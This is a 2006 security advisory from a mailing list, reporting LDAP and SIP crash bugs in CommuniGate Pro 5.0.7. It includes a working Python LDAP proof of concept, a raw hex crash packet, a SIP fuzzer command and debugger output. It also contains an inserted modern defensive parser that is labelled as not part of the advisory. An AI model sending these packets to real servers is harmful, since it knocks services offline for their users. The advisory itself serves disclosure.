[UNIX] CommuniGate Pro Server Multiple DoS (LDAP, SIP)
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 7 Feb 2006 16:25:34 +0200
Subject: [UNIX] CommuniGate Pro Server Multiple DoS (LDAP, SIP)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060207165028.AA88457D5@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
CommuniGate Pro Server Multiple DoS (LDAP, SIP)
------------------------------------------------------------------------
SUMMARY
"CommuniGate Pro is the most scalable and modern Internet Communications
application server on the market today." <http://www.stalker.com/content/solutions.htm>
Improper handling of malformed LDAP and SIP packets allows remote attackers
to crash CommuniGate Pro.
DETAILS
Vulnerable Systems:
* CommuniGate Pro Server version 5.0.7
Immune Systems:
* CommuniGate Pro Server version 5.0.8
LDAP DoS:
By crafting a special LDAP packet, attackers can crash the server
remotely.
Proof of Concept:
#!/usr/bin/env python
# Use this code at your own risk.
# It may crash your server!
# Author: Evgeny Legerov
import sys
import socket
HELP="""
CommuniGate Pro 5.0.6 vulnerability.
Found with ProtoVer LDAP testsuite v1.1
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1389495376 (LWP 20235)]
0xada99bbc in memcpy () from /lib/libc.so.6
(gdb) backtrace
#0 0xada99bbc in memcpy () from /lib/libc.so.6
#1 0x083924b8 in STCopyCString ()
#2 0x08349d5b in BERPackedData::makeCString ()
#3 0x081ae71a in VLDAPInput::processBINDrequest ()
#4 0x081af747 in VLDAPInput::processInput ()
#5 0x082c9373 in VStream::worker ()
#6 0x082ca1e9 in VStream::starter ()
#7 0x08399e7d in STThreadStarter ()
#8 0xadb8bb80 in start_thread () from /lib/libpthread.so.0
#9 0xadaf8dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0xada99bbc <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)
(gdb) info regi esi edi ecx
esi 0x8688961 141068641
edi 0x86c6fff 141324287
ecx 0x3fff7eae 1073708718
"""
print(HELP)
host = "localhost"
port = 389
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
# LDAPMessage: SEQUENCE { messageID 1, BindRequest { version 3, name "DN",
# simple authentication } }. The simple-auth field carries a long-form BER
# length of 0xffffffff (0x84 ff ff ff ff) with no data behind it; the server
# copies that claimed length unchecked (see the memcpy frame in the backtrace).
s = b"\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"
s += b"\x84\xff\xff\xff\xff"
sock.sendall(s)
sock.close()
LDAP DoS:
By crafting a special LDAP packet, attackers can crash the server remotely.
Example:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1458242640 (LWP 25554)]
0x080fa008 in VDirectoryFile::findParentDN ()
(gdb) backtrace
#0 0x080fa008 in VDirectoryFile::findParentDN ()
#1 0x080fa031 in VDirectoryFile::findParentDN ()
..
#353 0x080fa031 in VDirectoryFile::findParentDN ()
#354 0x080fcc6f in VDirectoryFile::findRecords ()
#355 0x080efc23 in VDirectory::findDirectoryRecords ()
#356 0x081b09b3 in VLDAPInput::processInput ()
#357 0x082cb5a3 in VStream::worker ()
#358 0x082cc419 in VStream::starter ()
#359 0x0839c369 in STThreadStarter ()
#360 0xa9a09b80 in start_thread () from /lib/libpthread.so.0
#361 0xa9976dee in clone () from /lib/libc.so.6
To reproduce the vulnerability, send the following data to the LDAP port:
30 82 02 38 02 01 01 63 82 02 31 04 82 02 15 64
63 3d 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 64 63 3d 65 78 61 6d 70 6c 65 2c 64 63
3d 63 6f 6d 0a 01 02 0a 01 00 02 01 00 02 01 00
01 01 00 a2 05 87 03 66 6f 6f 30 00
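Both LDAP crashes above come down to trusting attacker-supplied sizes: a BER length field that claims far more bytes than the packet holds, and a DN whose component count drives a per-component recursion off the stack. The following is an added example, not code from the advisory or from CommuniGate, of the bounds checks a defensive LDAP parser applies; all names are assumptions, while POC_BIND is the advisory's own 20-byte packet and GOOD_BIND is a constructed well-formed anonymous bind.

```python
# Added example, not from the advisory or CommuniGate: a bounds-checked BER
# TLV reader walking an LDAP BindRequest. Names are assumptions.
MAX_RDN = 64   # assumed cap on DN components (the findParentDN recursion case)

class BerError(ValueError):
    pass

def read_tlv(buf, off):
    """(tag, value, next_off) for the TLV at buf[off:]; BerError if malformed."""
    if off + 2 > len(buf):
        raise BerError("truncated header at offset %d" % off)
    tag, first, off = buf[off], buf[off + 1], off + 2
    if first == 0x80:
        raise BerError("indefinite length not allowed")
    if first & 0x80:                   # long form: 0x84 = four length bytes follow
        nbytes = first & 0x7F
        if nbytes > 4 or off + nbytes > len(buf):
            raise BerError("bad long-form length at offset %d" % (off - 1))
        length, off = int.from_bytes(buf[off:off + nbytes], "big"), off + nbytes
    else:
        length = first
    if length > len(buf) - off:        # the check the crashing parser lacked
        raise BerError("claimed length %d exceeds %d remaining bytes" % (length, len(buf) - off))
    return tag, buf[off:off + length], off + length

def parse_bind_request(packet):
    """LDAPMessage -> BindRequest -> (version, name, simple-auth bytes)."""
    _, msg, _ = read_tlv(packet, 0)            # SEQUENCE
    _, _msgid, off = read_tlv(msg, 0)          # INTEGER messageID
    op_tag, op, _ = read_tlv(msg, off)         # [APPLICATION 0] BindRequest
    if op_tag != 0x60:
        raise BerError("not a BindRequest (tag 0x%02x)" % op_tag)
    _, version, off = read_tlv(op, 0)
    _, name, off = read_tlv(op, off)
    _, password, _ = read_tlv(op, off)         # [CONTEXT 0] simple password
    return int.from_bytes(version, "big"), name.decode("ascii"), password

def bind_or_error(packet):
    """Parsed tuple on success, the rejection message as a string otherwise."""
    try:
        return parse_bind_request(packet)
    except BerError as exc:
        return str(exc)

def dn_within_limit(dn, limit=MAX_RDN):
    """False when the RDN count would drive a per-component recursion too deep."""
    return dn.count(",") + 1 <= limit

# Advisory PoC: the simple-auth field claims 0xffffffff bytes but carries none.
POC_BIND = bytes.fromhex("3012020101600d0201030402444e8084ffffffff")
# Constructed for contrast: a well-formed anonymous bind (version 3, empty DN).
GOOD_BIND = bytes.fromhex("300c020101600702010304008000")
```

With the check in place the PoC is rejected at the simple-auth field with "claimed length 4294967295 exceeds 0 remaining bytes" instead of reaching a memcpy, and a DN with hundreds of commas is refused before any lookup recurses on it.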
SIP DoS:
By crafting a special SIP packet, attackers can crash the server remotely.
Example:
StarGate:~# java -jar c07-sip-r2.jar -touri [email protected] -single 2361
Log file snippet:
Dec 9 16:18:14 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 started
Dec 9 16:20:35 localhost CommuniGatePro: Exception signal: 11, trying to recover
Dec 9 16:20:35 localhost CommuniGatePro: Exception in <STThread 87394E8 UDPReceiver 5060>
Dec 9 16:21:07 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 started
Dec 9 16:21:33 localhost CommuniGatePro: Exception signal: 11, trying to recover
Dec 9 16:21:33 localhost CommuniGatePro: Exception in <STThread 8738B60 UDPReceiver 5060>
0x4010e3ac in memmove () from /lib/libc.so.6
(gdb) i r
eax 0xffffffe0 -32
ecx 0x1 1
edx 0xffffffe1 -31
ebx 0x8699758 141137752
esp 0xbabff670 0xbabff670
ebp 0xbabff678 0xbabff678
esi 0x868eeae 141094574
edi 0xffffffe0 -32
eip 0x4010e3ac 0x4010e3ac
(gdb) x/i $pc
0x4010e3ac <memmove+92>: repz movsb %ds:(%esi),%es:(%edi)
(gdb) bt
#0 0x4010e3ac in memmove () from /lib/libc.so.6
#1 0x0836cdac in SBMutableData::setBytes ()
#2 0x08280964 in VSIPPacket::parseFields ()
#3 0x0827f8da in VSIPPacket::parseData ()
#4 0x0827c8e8 in VSIP::processReadPacket ()
#5 0x0827ce83 in VSIP::processUDPRequest ()
#6 0x081bfeb1 in VUDPListener::receiver ()
#7 0x081bfa71 in VUDPListener::receiverStarter ()
#8 0x0838ad1d in STThreadStarter ()
#9 0x4002af4c in pthread_start_thread () from /lib/libpthread.so.0
#10 0x4002afda in pthread_start_thread_event () from /lib/libpthread.so.0
#11 0x4015f92a in clone () from /lib/libc.so.6
Vendor Status:
The vendor has issued a new version with fixes: CommuniGate Pro Server version 5.0.8
ADDITIONAL INFORMATION
The information has been provided by <mailto:research@gleg.net.> Evgeny Legerov and <mailto:kf_lists@digitalmunition.com.> KF.
The original article can be found at:
http://www.gleg.net/cg_advisory.txt
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.